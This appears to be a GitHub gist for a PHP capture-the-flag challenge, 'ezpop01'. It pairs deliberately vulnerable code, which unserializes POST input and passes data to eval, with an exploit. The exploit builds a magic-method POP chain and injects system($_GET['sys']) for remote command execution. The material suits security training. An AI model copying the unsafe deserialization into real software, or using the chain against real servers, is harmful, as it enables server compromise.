Created
March 27, 2022 14:09
-
-
Save I-Info/cf77f14f9bdd8f6d8358911d04c1c600 to your computer and use it in GitHub Desktop.
ezpop01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
class crow | |
{ | |
public $v1; | |
public $v2; | |
function eval() | |
{ | |
echo new $this->v1($this->v2); | |
} | |
public function __invoke() | |
{ | |
// call: fin | |
$this->v1->world(); | |
} | |
} | |
class fin | |
{ | |
public $f1; | |
public function __destruct() // start | |
{ | |
// toString what | |
echo $this->f1 . '114514'; | |
} | |
public function run() | |
{ | |
($this->f1)(); | |
} | |
public function __call($a, $b) | |
{ | |
// get_flag mix | |
echo $this->f1->get_flag(); | |
} | |
} | |
class what | |
{ | |
public $a; | |
public function __toString() | |
{ | |
// run: mix | |
$this->a->run(); | |
return 'hello'; | |
} | |
} | |
class mix | |
{ | |
public $m1; | |
public function run() | |
{ | |
// invoke: crow | |
($this->m1)(); | |
} | |
public function get_flag() | |
{ | |
eval('#' . $this->m1); | |
} | |
} | |
if (isset($_POST['cmd'])) { | |
unserialize($_POST['cmd']); | |
die(); | |
} else { | |
highlight_file(__FILE__); | |
die(); | |
} | |
// exp | |
$a1 = new fin(); | |
$a2 = new what(); | |
$a3 = new mix(); | |
$a4 = new crow(); | |
$a5 = new fin(); | |
$a6 = new mix(); | |
$a1->f1 = $a2; // toString | |
$a2->a = $a3; // run | |
$a3->m1 = $a4; // invoke | |
$a4->v1 = $a5; // call | |
$a5->f1 = $a6; // get_flag | |
$a6->m1 = "\necho('OK');system(\$_GET['sys']);exit();"; | |
echo urlencode(serialize($a1)); | |
echo "\n<br/>"; | |
die(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment